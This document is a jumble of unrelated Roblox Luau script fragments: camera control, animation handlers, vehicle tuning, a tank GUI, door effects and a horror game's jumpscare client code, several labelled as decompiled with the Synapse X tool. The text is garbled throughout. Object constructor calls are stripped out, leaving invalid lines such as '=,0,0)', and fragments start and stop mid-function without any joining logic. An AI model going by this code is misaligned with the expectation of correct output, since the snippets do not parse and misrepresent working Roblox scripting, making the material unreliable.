func(v.Character) end end end function this:Deconstruct() -- Delete the player's object end return this
--[[ CameraModule - This ModuleScript implements a singleton class to manage the selection, activation, and deactivation of the current camera controller, character occlusion controller, and transparency controller. This script binds to RenderStepped at Camera priority and calls the Update() methods on the active controller instances. The camera controller ModuleScripts implement classes which are instantiated and activated as-needed, they are no longer all instantiated up front as they were in the previous generation of PlayerScripts. 2018 PlayerScripts Update - AllYourBlox --]]
local CameraModule = {} CameraModule.__index = CameraModule local FFlagUserCameraToggle do local success, result = pcall(function() return UserSettings():IsUserFeatureEnabled("UserCameraToggle") end) FFlagUserCameraToggle = success and result end local FFlagUserRemoveTheCameraApi do local success, result = pcall(function() return UserSettings():IsUserFeatureEnabled("UserRemoveTheCameraApi") end) FFlagUserRemoveTheCameraApi = success and result end
-- Connection class
local Connection = {} Connection.__index = Connection function, fn) return setmetatable({ _connected = true, _signal = signal, _fn = fn, _next = false, }, Connection) end function Connection:Disconnect() assert(self._connected, "Can't disconnect a connection twice.") self._connected = false -- Unhook the node, but DON'T clear it. That way any fire calls that are -- currently sitting on this node will be able to iterate forwards off of -- it, but any subsequent fire calls will not hit it, and it will be GCed -- when no more fire calls are sitting on it. if self._signal._handlerListHead == self then self._signal._handlerListHead = self._next else local prev = self._signal._handlerListHead while prev and prev._next ~= self do prev = prev._next end if prev then prev._next = self._next end end end
-- Player's tank GUI
GUI = script.Parent.Parent.Parent.PlayerGui.TankGUI; GUI.HP.Hitpoints.Text = parts.Parent:findFirstChild("Damage").Value local Hull = parts.Parent:findFirstChild("Damage") if Hull.Value<0 then GUI.HP.Hitpoints.Text = "DISABLED" end local MGDamage = math.random(45,45) braking = false; firingMg = false; reloading = false; currRound = tankStats.Round; -- Current loaded ammo (AP/HE) myMouse = nil; function updateAmmo() GUI.Ammo.Text = "Cannon Ammo = " .. tankStats[tankStats.Round.Value .. "Ammo"].Value; GUI.MG_Ammo.Text = tankStats.MGAmmo.Value; GUI.HP.Hitpoints.Text = parts.Parent:findFirstChild("Damage").Value end function Brakes() for i = 1, 5 do parts.Engine.BodyVelocity.Velocity =,0,0) print("Brakes activated") end end
-- Decompiled with the Synapse X Luau decompiler.
local l__LocalPlayer__1 = game:GetService("Players").LocalPlayer; local l__Character__2 = game:GetService("Players").LocalPlayer.Character; hrp = l__Character__2:WaitForChild("HumanoidRootPart"); hp2 ="Part"); hp2.Name = "Door"; hp2.Size =, 5.26, 1.21); hp2.CanCollide = false; hp2.Transparency = 1; hp2.Parent = l__Character__2; local v3 ="Weld"); v3.Parent = hp2; v3.Part0 = hp2; v3.Part1 = l__Character__2.HumanoidRootPart; v3.C0 =, 0.5, 0); ts = game:GetService("TweenService"); ti2 =, Enum.EasingStyle.Quad, Enum.EasingDirection.Out, 0, false, 0); hp2.Touched:connect(function(p1) if p1.Name == "Trigger" and p1:FindFirstChild("Open") == nil and l__Character__2.Humanoid.Health >= 0 then local v4 ="BoolValue", p1); local v5 = script.DoorO:Clone(); v5.Parent = p1; v5:Play(); game.Debris:AddItem(v5, 3); v4.Name = "Open"; local l__d1__6 = p1.Parent.d1; local l__d2__7 = p1.Parent.d2; l__d1__6.CanCollide = false; l__d2__7.CanCollide = false; local v8 = ts:Create(l__d1__6, ti2, { CFrame = l__d1__6.CFrame +, 15, 0) }); ts:Create(l__d2__7, ti2, { CFrame = l__d2__7.CFrame +, 15, 0) }):Play(); v8:Play(); wait(3); local v9 = script.DoorC:Clone(); v9.Parent = p1; v9:Play(); game.Debris:AddItem(v9, 3); local v10 = ts:Create(l__d2__7, ti2, { CFrame = p1.Parent.d2.CFrame }); ts:Create(l__d1__6, ti2, { CFrame = p1.Parent.d1.CFrame }):Play(); v10:Play(); wait(1.5); l__d1__6.CanCollide = true; l__d2__7.CanCollide = true; game.Debris:AddItem(v4, 0); end; end);
------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------
function onRunning(speed) if speed > 0.01 then local scale = 15.0 playAnimation("walk", 0.1, Humanoid) setAnimationSpeed(speed / scale) pose = "Running" else playAnimation("idle", 0.1, Humanoid) pose = "Standing" end end function onDied() pose = "Dead" end function onJumping() playAnimation("jump", 0.1, Humanoid) jumpAnimTime = jumpAnimDuration pose = "Jumping" end function onClimbing(speed) local scale = 5.0 playAnimation("climb", 0.1, Humanoid) setAnimationSpeed(speed / scale) pose = "Climbing" end function onGettingUp() pose = "GettingUp" end function onFreeFall() if (jumpAnimTime <= 0) then playAnimation("fall", fallTransitionTime, Humanoid) end pose = "FreeFall" end function onFallingDown() pose = "FallingDown" end function onSeated() pose = "Seated" end function onPlatformStanding() pose = "PlatformStanding" end function onSwimming(speed) if speed > 1.00 then local scale = 10.0 playAnimation("swim", 0.4, Humanoid) setAnimationSpeed(speed / scale) pose = "Swimming" else playAnimation("swimidle", 0.4, Humanoid) pose = "Standing" end end function getTool() for _, kid in ipairs(Figure:GetChildren()) do if kid.className == "Tool" then return kid end end return nil end function getToolAnim(tool) for _, c in ipairs(tool:GetChildren()) do if c.Name == "toolanim" and c.className == "StringValue" then return c end end return nil end function animateTool() if (toolAnim == "None") then playToolAnimation("toolnone", toolTransitionTime, Humanoid) return end if (toolAnim == "Slash") then playToolAnimation("toolslash", 0, Humanoid) return end if (toolAnim == "Lunge") then playToolAnimation("toollunge", 0, Humanoid) return end end function moveSit() RightShoulder.MaxVelocity = 0.15 LeftShoulder.MaxVelocity = 0.15 RightShoulder:SetDesiredAngle(3.14 /2) LeftShoulder:SetDesiredAngle(-3.14 /2) RightHip:SetDesiredAngle(3.14 /2) LeftHip:SetDesiredAngle(-3.14 /2) end local lastTick = 0 function move(time) local amplitude = 1 local frequency = 1 local deltaTime = time - lastTick lastTick = time local climbFudge = 0 local setAngles = false if (jumpAnimTime > 0) then jumpAnimTime = jumpAnimTime - deltaTime end if (pose == "FreeFall" and jumpAnimTime <= 0) then playAnimation("fall", fallTransitionTime, Humanoid) elseif (pose == "Seated") then playAnimation("sit", 0.5, Humanoid) return elseif (pose == "Running") then playAnimation("walk", 0.1, Humanoid) elseif (pose == "Dead" or pose == "GettingUp" or pose == "FallingDown" or pose == "Seated" or pose == "PlatformStanding") then stopAllAnimations() amplitude = 0.1 frequency = 1 setAngles = true end -- Tool Animation handling local tool = getTool() if tool then animStringValueObject = getToolAnim(tool) if animStringValueObject then toolAnim = animStringValueObject.Value -- message recieved, delete StringValue animStringValueObject.Parent = nil toolAnimTime = time + .3 end if time > toolAnimTime then toolAnimTime = 0 toolAnim = "None" end animateTool() else stopToolAnimations() toolAnim = "None" toolAnimInstance = nil toolAnimTime = 0 end end
-- References
SyncAPI = script.Parent; Tool = SyncAPI.Parent; Player = nil;
--[[ Takes two tables A, B and a key, returns if two tables have the same value at key ]]
return function(A, B, key) if A and B and key and key ~= "" and A[key] and B[key] and A[key] == B[key] then return true end return false end
-- elseif input.UserInputType == self.activeGamepad and input.KeyCode == Enum.KeyCode.ButtonL3 then -- if (state == Enum.UserInputState.Begin) then -- self.L3ButtonDown = true -- elseif (state == Enum.UserInputState.End) then -- self.L3ButtonDown = false -- self.currentZoomSpeed = 1.00 -- end -- end
end function BaseCamera:DoKeyboardZoom(name, state, input) if not self.hasGameLoaded and VRService.VREnabled then return Enum.ContextActionResult.Pass end if state ~= Enum.UserInputState.Begin then return Enum.ContextActionResult.Pass end if self.distanceChangeEnabled and player.CameraMode ~= Enum.CameraMode.LockFirstPerson then if input.KeyCode == Enum.KeyCode.I then self:SetCameraToSubjectDistance( self.currentSubjectDistance - 5 ) elseif input.KeyCode == Enum.KeyCode.O then self:SetCameraToSubjectDistance( self.currentSubjectDistance + 5 ) end return Enum.ContextActionResult.Sink end return Enum.ContextActionResult.Pass end function BaseCamera:BindAction(actionName, actionFunc, createTouchButton, ...) table.insert(self.boundContextActions, actionName) ContextActionService:BindActionAtPriority(actionName, actionFunc, createTouchButton, CAMERA_ACTION_PRIORITY, ...) end function BaseCamera:BindGamepadInputActions() self:BindAction("BaseCameraGamepadPan", function(name, state, input) return self:GetGamepadPan(name, state, input) end, false, Enum.KeyCode.Thumbstick2) self:BindAction("BaseCameraGamepadZoom", function(name, state, input) return self:DoGamepadZoom(name, state, input) end, false, Enum.KeyCode.DPadLeft, Enum.KeyCode.DPadRight, Enum.KeyCode.ButtonR3) end function BaseCamera:BindKeyboardInputActions() self:BindAction("BaseCameraKeyboardPanArrowKeys", function(name, state, input) return self:DoKeyboardPanTurn(name, state, input) end, false, Enum.KeyCode.Left, Enum.KeyCode.Right) self:BindAction("BaseCameraKeyboardZoom", function(name, state, input) return self:DoKeyboardZoom(name, state, input) end, false, Enum.KeyCode.I, Enum.KeyCode.O) end local function isInDynamicThumbstickArea(input) local playerGui = player:FindFirstChildOfClass("PlayerGui") local touchGui = playerGui and playerGui:FindFirstChild("TouchGui") local touchFrame = touchGui and touchGui:FindFirstChild("TouchControlFrame") local thumbstickFrame = touchFrame and touchFrame:FindFirstChild("DynamicThumbstickFrame") if not thumbstickFrame then return false end local frameCornerTopLeft = thumbstickFrame.AbsolutePosition local frameCornerBottomRight = frameCornerTopLeft + thumbstickFrame.AbsoluteSize if input.Position.X >= frameCornerTopLeft.X and input.Position.Y >= frameCornerTopLeft.Y then if input.Position.X <= frameCornerBottomRight.X and input.Position.Y <= frameCornerBottomRight.Y then return true end end return false end
-- Constructor.
function return setmetatable({ LengthChanged = Signal:CreateNewSignal(), RayHit = Signal:CreateNewSignal(), RayExited = Signal:CreateNewSignal() }, FastCast) end
-- Existance in this list signifies that it is an emote, the value indicates if it is a looping emote
local emoteNames = { wave = false, point = false, dance = true, dance2 = true, dance3 = true, laugh = false, cheer = false} math.randomseed(tick()) function configureAnimationSet(name, fileList) if (animTable[name] ~= nil) then for _, connection in pairs(animTable[name].connections) do connection:disconnect() end end animTable[name] = {} animTable[name].count = 0 animTable[name].totalWeight = 0 animTable[name].connections = {} -- check for config values local config = script:FindFirstChild(name) if (config ~= nil) then
------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------
function onSwimming(speed) if speed > 1.00 then local scale = 10.0 playAnimation("swim", 0.4, Humanoid) setAnimationSpeed(speed / scale) pose = "Swimming" else playAnimation("swimidle", 0.4, Humanoid) pose = "Standing" end end function animateTool() if (toolAnim == "None") then playToolAnimation("toolnone", toolTransitionTime, Humanoid, Enum.AnimationPriority.Idle) return end if (toolAnim == "Slash") then playToolAnimation("toolslash", 0, Humanoid, Enum.AnimationPriority.Action) return end if (toolAnim == "Lunge") then playToolAnimation("toollunge", 0, Humanoid, Enum.AnimationPriority.Action) return end end function getToolAnim(tool) for _, c in ipairs(tool:GetChildren()) do if c.Name == "toolanim" and c.className == "StringValue" then return c end end return nil end local lastTick = 0 function stepAnimate(currentTime) local amplitude = 1 local frequency = 1 local deltaTime = currentTime - lastTick lastTick = currentTime local climbFudge = 0 local setAngles = false if (jumpAnimTime > 0) then jumpAnimTime = jumpAnimTime - deltaTime end if (pose == "FreeFall" and jumpAnimTime <= 0) then playAnimation("fall", fallTransitionTime, Humanoid) elseif (pose == "Seated") then playAnimation("sit", 0.5, Humanoid) return elseif (pose == "Running") then playAnimation("walk", 0.2, Humanoid) elseif (pose == "Dead" or pose == "GettingUp" or pose == "FallingDown" or pose == "Seated" or pose == "PlatformStanding") then stopAllAnimations() amplitude = 0.1 frequency = 1 setAngles = true end -- Tool Animation handling local tool = Character:FindFirstChildOfClass("Tool") if tool and tool:FindFirstChild("Handle") then local animStringValueObject = getToolAnim(tool) if animStringValueObject then toolAnim = animStringValueObject.Value -- message recieved, delete StringValue animStringValueObject.Parent = nil toolAnimTime = currentTime + .3 end if currentTime > toolAnimTime then toolAnimTime = 0 toolAnim = "None" end animateTool() else stopToolAnimations() toolAnim = "None" toolAnimInstance = nil toolAnimTime = 0 end end
--[=[ Executes on the next event connection. @param event RBXScriptSignal @param _function function @return RBXScriptConnection ]=]
function SignalUtils.onNext(event, _function) assert(typeof(event) == "RBXScriptSignal", "Bad event") assert(type(_function) == "function", "Bad _function") local conn conn = event:Connect(function(...) if conn.Connected then return -- Multiple events got queued end conn:Disconnect() _function(...) end) return conn end return SignalUtils
--Torque Curve Tune.Horsepower = 300 -- [TORQUE CURVE VISUAL] Tune.IdleRPM = 100 -- Tune.PeakRPM = 15000 -- Use sliders to manipulate values Tune.Redline = 15000 -- Copy and paste slider values into the respective tune values Tune.EqPoint = 5500 Tune.PeakSharpness = 7.5 Tune.CurveMult = 0.16 --Incline Compensation Tune.InclineComp = 1.7 -- Torque compensation multiplier for inclines (applies gradient from 0-90 degrees) --Misc Tune.RevAccel = 500 -- RPM acceleration when clutch is off Tune.RevDecay = 75 -- RPM decay when clutch is off Tune.RevBounce = 0 -- RPM kickback from redline Tune.IdleThrottle = 3 -- Percent throttle at idle Tune.ClutchTol = 500 -- Clutch engagement threshold (higher = faster response)
--------LEFT DOOR --------
game.Workspace.doorleft.l11.BrickColor = game.Workspace.doorleft.l23.BrickColor = game.Workspace.doorleft.l32.BrickColor = game.Workspace.doorleft.l41.BrickColor = game.Workspace.doorleft.l53.BrickColor = game.Workspace.doorleft.l62.BrickColor = game.Workspace.doorleft.l71.BrickColor = game.Workspace.doorleft.l12.BrickColor = game.Workspace.doorleft.l21.BrickColor = game.Workspace.doorleft.l33.BrickColor = game.Workspace.doorleft.l42.BrickColor = game.Workspace.doorleft.l51.BrickColor = game.Workspace.doorleft.l63.BrickColor = game.Workspace.doorleft.l72.BrickColor = game.Workspace.doorleft.l13.BrickColor = game.Workspace.doorleft.l22.BrickColor = game.Workspace.doorleft.l31.BrickColor = game.Workspace.doorleft.l43.BrickColor = game.Workspace.doorleft.l52.BrickColor = game.Workspace.doorleft.l61.BrickColor = game.Workspace.doorleft.l73.BrickColor = game.Workspace.doorleft.pillar.BrickColor = game.Workspace.Lighting.flashcurrent.Value = "13"
--Disable normal death
repeat wait() until hum.Health == 0
-- GuiControls variables
local PressedColor =,185/255,255/255) local LiftedColor =,255/255,255/255) local GuiControls = script.Parent:WaitForChild("GuiControls") local Accelerate = GuiControls:WaitForChild("Accelerate") local Steer = GuiControls:WaitForChild("Steer") local UpButton = Accelerate:WaitForChild("Up") local DownButton = Accelerate:WaitForChild("Down") local RightButton = Steer:WaitForChild("Right") local LeftButton = Steer:WaitForChild("Left") local OffButton = GuiControls:WaitForChild("OffButton")
-- regeneration
function regenHealth() if regening then return end regening = false while Humanoid.Health < Humanoid.MaxHealth do local s = task.wait(1) local health = Humanoid.Health if health > 0 and health < Humanoid.MaxHealth then local newHealthDelta = 0.01 * s * Humanoid.MaxHealth health = health + newHealthDelta Humanoid.Health = math.min(health,Humanoid.MaxHealth) end end if Humanoid.Health > Humanoid.MaxHealth then Humanoid.Health = Humanoid.MaxHealth end regening = false end Humanoid.HealthChanged:connect(regenHealth)
-- Number of bullets in a clip
local ClipSize = 30
-- Decompiled with the Synapse X Luau decompiler.
local v1 = {}; local v2 = require(game.ReplicatedStorage.Modules.Lightning); local v3 = require(game.ReplicatedStorage.Modules.Xeno); local v4 = require(game.ReplicatedStorage.Modules.CameraShaker); local l__TweenService__5 = game.TweenService; local l__Debris__6 = game.Debris; local l__ReplicatedStorage__1 = game.ReplicatedStorage; function v1.RunStompFx(p1, p2, p3, p4) local v7 = l__ReplicatedStorage__1.KillFX[p1].Stomp:Clone(); v7.Parent = p2.Parent.UpperTorso and p2; v7:Play(); game.Debris:AddItem(v7, 4); local v8 = l__ReplicatedStorage__1.KillFX[p1].Effect:Clone(); v8.Parent = p2.Parent.UpperTorso and p2; v8.Effect.Enabled = true; v8.Position = p2.Parent.UpperTorso.Position or p2.Position; game.Debris:AddItem(v8, 4); local v9 ="WeldConstraint", v8); v9.Part0 = v8; v9.Part1 = p2.Parent.UpperTorso and p2; return nil; end; return v1;
-- Script GUID: {6BA2CDC4-2490-4BF3-A382-3936CFCA3401} -- Decompiled with the Synapse X Luau decompiler.
local v1 = script:FindFirstAncestor("MainUI"); local l__LocalPlayer__2 = game.Players.LocalPlayer; local v3 = require(l__LocalPlayer__2:WaitForChild("PlayerScripts"):WaitForChild("PlayerModule")):GetControls(); local v4 = game["Run Service"]; local l__UserInputService__5 = game:GetService("UserInputService"); local l__TweenService__6 = game:GetService("TweenService"); local v7 = require(script:WaitForChild("Lightning")); local l__Bricks__1 = game:GetService("ReplicatedStorage"):WaitForChild("Bricks"); local u2 = require(script.Parent); local v8 = require(game:GetService("ReplicatedStorage"):WaitForChild("ClientModules"):WaitForChild("Module_Events")); v8.init(u2); local v10 =; local v1110 = workspace game.SoundService.Main.Volume = 1; l__Bricks__1:WaitForChild("PadlockHint").OnClientEvent:Connect(function(p1, p2, p3) local l__Hints__11 = v1.Parent.PermUI.Hints; l__Hints__11.Visible = true; if not p1 or not p2 then l__Hints__11.Visible = false; for v12, v13 in pairs(l__Hints__11:GetChildren()) do if v13.Name == "Icon" then v13:Destroy(); end; end; return; end; local v14 = l__Hints__11.Template:Clone(); v14.Name = "Icon"; v14.Visible = true; v14.ImageRectOffset = * p1, 0); v14.TextLabel.Text = p2; if p3 and p3 ~= l__LocalPlayer__2.UserId then v14.User.Visible = true; v14.User.Image = "rbxthumb://type=AvatarHeadShot&id=" .. p3 .. "&w=48&h=48"; end; v14.Parent = l__Hints__11; end); l__Bricks__1:WaitForChild("MotorReplication").OnClientEvent:Connect(function(p4, p5, p6, p7) if not p4 or not p4:FindFirstChild("Humanoid") or not p4:FindFirstChild("Humanoid"):GetAttribute("AppearanceFinal") then return; end; local v15 =, 0.22, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1); local v16 =, -1.1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1); local v17 =, 0.88, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1); local v18 =, 0.62, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1); local v19 =, 0.62, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1); if p4 and p4:FindFirstChild("HumanoidRootPart") then local l__HumanoidRootPart__20 = p4:WaitForChild("HumanoidRootPart", 0.5); local l__ClientMotors__21 = p4:FindFirstChild("ClientMotors"); local l__Waist__22 = p4:WaitForChild("UpperTorso", 0.5):WaitForChild("Waist", 0.5); local l__Neck__23 = p4:WaitForChild("Head", 0.5):WaitForChild("Neck", 0.5); local l__Root__24 = p4:WaitForChild("LowerTorso", 0.5):WaitForChild("Root", 0.5); local l__RightShoulder__25 = p4:WaitForChild("RightUpperArm", 0.5):WaitForChild("RightShoulder", 0.5); local l__LeftShoulder__26 = p4:WaitForChild("LeftUpperArm", 0.5):WaitForChild("LeftShoulder", 0.5); local l__Value__27 = l__Root__24:WaitForChild("CVal").Value; local l__Value__28 = l__Waist__22:WaitForChild("CVal").Value; local l__Value__29 = l__Neck__23:WaitForChild("CVal").Value; local l__Value__30 = l__LeftShoulder__26:WaitForChild("CVal").Value; local l__Value__31 = l__RightShoulder__25:WaitForChild("CVal").Value; local v32 = v16 * CFrame.Angles(0, math.rad(p5 * -45), 0); local v33 = v15 * CFrame.Angles(math.rad(p6 * 0.25), 0, 0) * CFrame.Angles(0, math.rad(p5 * 45), 0) * CFrame.Angles(0, 0, math.rad(p7)); local v34 = v17 * CFrame.Angles(math.rad(p6 * 0.5), 0, 0); local v35 = v19 * CFrame.Angles(math.rad(p6 * -0.025), 0, 0); local v36 = v18 * CFrame.Angles(math.rad(p6 * -0.025), 0, 0); if not l__ClientMotors__21 then local v37 ="BoolValue"); v37.Name = "ClientMotors"; v37.Parent = p4; end; if p4.Humanoid:GetAttribute("Stunned") == true then if l__HumanoidRootPart__20 then l__Waist__22.Enabled = false; l__Neck__23.Enabled = false; l__Root__24.Enabled = false; l__RightShoulder__25.Enabled = false; l__LeftShoulder__26.Enabled = false; return; end; else l__Waist__22.Enabled = true; l__Neck__23.Enabled = true; l__Root__24.Enabled = true; l__RightShoulder__25.Enabled = true; l__LeftShoulder__26.Enabled = true; if l__HumanoidRootPart__20 and (l__HumanoidRootPart__20.Position - > 100 then l__Root__24.C0 = v32; l__Waist__22.C0 = v33; l__Neck__23.C0 = v34; l__LeftShoulder__26.C0 = v35; l__RightShoulder__25.C0 = v36; return; end; if l__HumanoidRootPart__20 then local v38 = {}; local v39 = {}; local v40 = {}; local v41 = {}; local v42 = {}; v38.C0 = v32; v39.C0 = v33; v40.C0 = v34; v41.C0 = v35; v42.C0 = v36; l__TweenService__6:Create(l__Root__24,, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut), v38):Play(); l__TweenService__6:Create(l__Waist__22,, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut), v39):Play(); l__TweenService__6:Create(l__Neck__23,, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut), v40):Play(); l__TweenService__6:Create(l__RightShoulder__25,, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut), v42):Play(); l__TweenService__6:Create(l__LeftShoulder__26,, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut), v41):Play(); end; end; end; end); l__Bricks__1:WaitForChild("SoundToClient").OnClientEvent:Connect(function(p8, p9, p10, p11) if p8 and p9 then u2.playaudio(p8, p9, p10, p11); end; end); local u3 = {}; l__Bricks__1:WaitForChild("UseEnemyModule").OnClientEvent:Connect(function(p12, p13, ...) if not u3[p12] then u3[p12] = require(game:GetService("ReplicatedStorage").ClientModules.EntityModules:FindFirstChild(p12)); end; u3[p12][p13](u2, ...); end); l__Bricks__1:WaitForChild("UseEventModule").OnClientEvent:Connect(function(p14, ...) v8[p14](...); end); l__Bricks__1:WaitForChild("ReplicateAnimation").OnClientEvent:Connect(function(p15, p16, p17, p18, p19, p20) local v43 = game.ReplicatedStorage.AnimationRoot:Clone(); local v44 = p15.Humanoid.Animator:LoadAnimation(v43.Animation); v43:SetPrimaryPartCFrame(p15.PrimaryPart.CFrame); v43.Parent =; l__TweenService__6:Create(v43.PrimaryPart,, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut), { CFrame = p17 }):Play(); local v45 = nil; local v46 = v43.AnimationController:LoadAnimation(p16); p16 = p15.Humanoid.Animator:LoadAnimation(p16); local v47 = false; if u2.char == p15 then u2.stopcam = true; v47 = true; end; if p19 and p20 and v47 then p20 = p19:LoadAnimation(p20); v45 = p19.Parent:FindFirstChild("CamAttach", true) and v45.WorldCFrame; u2.hideplayers = -1; end; for v48 = 1, 1000 do if p16.Length > 0 then if p20 == nil then break; end; if p20.Length > 0 then break; end; end; task.wait(); end; p16:Play(0, 1, 1); v44:Play(0, 1, 1); v46:Play(0, 1, 1); if p19 and p20 then p20:Play(0, 1, 1); end; local l__CFrame__49 = p15.PrimaryPart.CFrame; local l__CFrame__50 =; local u4 = false; local u5 = tick(); task.spawn(function() for v51 = 1, 100000 do task.wait(); if u4 then break; end; local v52 = l__TweenService__6:GetValue((tick() - u5) * 4, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut); if v45 then v52 = l__TweenService__6:GetValue((tick() - u5) / 1.5, Enum.EasingStyle.Quad, Enum.EasingDirection.InOut); end; p15.PrimaryPart.CFrame = p15.PrimaryPart.CFrame:Lerp(v43.LowerTorso.CFrame *, 0.96, 0), v52); if v47 then local v53 if v45 then v53 = v45; else v53 = p15.Head.CFrame *, 0.15, -0.25) * CFrame.Angles(math.rad(math.clamp(u2.bobspring.p.Y, -80, 80)), math.rad(math.clamp(u2.bobspring.p.X, -80, 80)), math.rad(math.clamp(u2.bobspring.p.Z, -40, 40))) * CFrame.Angles(0, math.rad(u2.camlockedoffset[1]), 0) * CFrame.Angles(math.rad(u2.camlockedoffset[2]), 0, 0); end; =, v52); end; end; end); task.wait(p16.Length - 0.1); u4 = true; l__TweenService__6:Create(p15.PrimaryPart,, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut), { CFrame = p18 }):Play(); p16:AdjustWeight(0.01); p16:AdjustSpeed(0.01); p16:Stop(0); v46:Stop(0); v44:Stop(0); v43:Destroy(); if v47 then local v54 = tick(); local l__CFrame__55 =; for v56 = 1, 10000 do = l__CFrame__55:Lerp(u2.basecamcf * u2.csgo, (l__TweenService__6:GetValue((tick() - v54) * 4, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut))); task.wait(); if v54 + 0.25 <= tick() then break; end; end; u2.stopcam = false; u2.crouching = false; end; end); spawn(function() while true do task.wait(0.1) if v1110:FindFirstChild("FigureSetup", true) then local l__FigureRagdoll__19 = v1110:FindFirstChild("FigureSetup", true).FigureRagdoll; local l__Parent__20 = l__FigureRagdoll__19.Parent; local v21 = 0; local l__Click__22 = l__FigureRagdoll__19.Head.Click; local l__Growl__23 = l__FigureRagdoll__19.Head.Growl; local v24 = {}; for v25, v26 in pairs(l__FigureRagdoll__19:GetDescendants()) do if v26:IsA("Light") and v26.Name == "BlisterLight" then v26.Enabled = true; v26.Brightness = 0; table.insert(v24, { Light = v26, Distance = l__FigureRagdoll__19.Head.Position - v26.Parent.WorldPosition }); end; end; local v27 =, Enum.EasingStyle.Linear); for v28 = 1, 100000000 do wait(0.1); if not l__FigureRagdoll__19 then break; end; if l__FigureRagdoll__19.Parent ~= l__Parent__20 then break; end; local v29 = (l__Click__22.PlaybackLoudness + l__Growl__23.PlaybackLoudness) / 60; if v29 ~= v21 then for v30, v31 in v24, nil do delay(v31.Distance / 2, function() l__TweenService__6:Create(v31.Light, v27, { Brightness = v29 }):Play(); end); end; end; v21 = v29; end; end; if v1110:FindFirstChild("FigureAnimatedWelded", true) then local l__FigureAnimatedWelded__32 = v1110:FindFirstChild("FigureAnimatedWelded", true); local l__Parent__33 = l__FigureAnimatedWelded__32.Parent; local v34 = 0; local l__Click__35 = l__FigureAnimatedWelded__32.Parent.Head.Click; local l__Growl__36 = l__FigureAnimatedWelded__32.Parent.Head.Growl; local v37 = {}; for v38, v39 in pairs(l__FigureAnimatedWelded__32:GetDescendants()) do if v39:IsA("Light") and v39.Name == "BlisterLight" then v39.Enabled = true; v39.Brightness = 0; table.insert(v37, { Light = v39, Distance = l__FigureAnimatedWelded__32.Parent.Head.Position - v39.Parent.WorldPosition }); end; end; local v40 =, Enum.EasingStyle.Linear); for v41 = 1, 100000000 do wait(0.1); if not l__FigureAnimatedWelded__32 then break; end; if l__FigureAnimatedWelded__32.Parent ~= l__Parent__33 then break; end; local v42 = (l__Click__35.PlaybackLoudness + l__Growl__36.PlaybackLoudness) / 90 - 0.15; if v42 ~= v34 then for v43, v44 in v37, nil do delay(v44.Distance / 4, function() l__TweenService__6:Create(v44.Light, v40, { Brightness = v42 }):Play(); end); end; end; v34 = v42; end; end; end; end) local u6 = false; l__Bricks__1:WaitForChild("Jumpscare").OnClientEvent:Connect(function(p21) if u6 == true then return; end; u6 = true; v1.MainFrame.Heartbeat.Visible = false; if p21 == "Seek" then u2.deathtick = tick() + 0.5; if workspace:FindFirstChild("SeekMoving", true) then local l__SeekMoving__57 = workspace:FindFirstChild("SeekMoving", true); u2.stopcam = true; u2.fovtarget = 40; local v58 = tick(); for v59 = 1, 10000 do = (u2.basecamcf * u2.csgo):Lerp(l__SeekMoving__57.PrimaryPart.CamAttach.WorldCFrame, (l__TweenService__6:GetValue((tick() - v58) * 4, Enum.EasingStyle.Sine, Enum.EasingDirection.In))); task.wait(); if v58 + 0.25 <= tick() then break; end; end; else warn("cant find seekmoving"); end; script.Jumpscare_Seek:Play(); v1.Jumpscare_Seek.Visible = true; local v60 = tick(); for v61 = 1, 1000 do local v62 = math.clamp((tick() - v60) * 2, 0.1, 1); v1.Jumpscare_Seek.ImageLabel.Position = + math.random(-100, 100) / (5000 * v62), 0, 0.5 + math.random(-100, 100) / (2500 * v62), 0); v1.Jumpscare_Seek.BackgroundColor3 =, 4) / 12, 0, 0); game["Run Service"].RenderStepped:wait(); if v60 + 0.7 <= tick() then break; end; end; u2.stopcam = false; script.Jumpscare_Seek:Stop(); script.Kill:Play(); v1.Jumpscare_Seek.ImageLabel.Visible = false; for v63 = 1, 4 do v1.Jumpscare_Seek.BackgroundColor3 =, 1), 0, 0); wait(); end; v1.Jumpscare_Seek.Visible = false; u2.deathtick = tick(); u2.fovtarget = 70; return; end; if p21 == "Rush" then u2.deathtick = tick() + 10; game.SoundService.Main.Volume = 0; script.Jumpscare_Rush:Play(); v1.Jumpscare_Rush.Visible = true; local v64 = tick(); local v65 = math.random(5, 30) / 10; local v66 = v65 + math.random(10, 60) / 10; local v67 = 0.25; for v68 = 1, 100000 do task.wait(); if v64 + v65 <= tick() then v1.Jumpscare_Rush.ImageLabel.Visible = true; v65 = v65 + math.random(7, 44) / 10; script.Jumpscare_Rush.Pitch = 1 + math.random(-100, 100) / 500; v1.Jumpscare_Rush.BackgroundColor3 =, 0, math.random(0, 10) / 255); v1.Jumpscare_Rush.ImageLabel.Position =, math.random(-2, 2), 0.5, math.random(-2, 2)); v67 = v67 + 0.05; v1.Jumpscare_Rush.ImageLabel.Size =, 0, v67, 0); end; if v64 + v66 <= tick() then break; end; end; v1.Jumpscare_Rush.ImageLabel.Visible = true; script.Jumpscare_Rush:Stop(); script.Jumpscare_Rush2:Play(); v1.Jumpscare_Rush.ImageLabel.Visible = false; v1.Jumpscare_Rush.ImageLabelBig.Visible = true; v1.Jumpscare_Rush.ImageLabelBig:TweenSize(, 0, 2.5, 0), "In", "Sine", 0.3, true); local v69 = tick(); for v70 = 1, 1000 do local v71 = math.random(0, 10) / 10; v1.Jumpscare_Rush.BackgroundColor3 =, v71, math.clamp(math.random(25, 50) / 50, v71, 1)); v1.Jumpscare_Rush.ImageLabelBig.Position = + math.random(-100, 100) / 5000, 0, 0.5 + math.random(-100, 100) / 3000, 0); task.wait(0.016666666666666666); if v69 + 0.3 <= tick() then break; end; end; v1.Jumpscare_Rush.ImageLabelBig.Visible = false; v1.Jumpscare_Rush.BackgroundColor3 =, 0, 0); 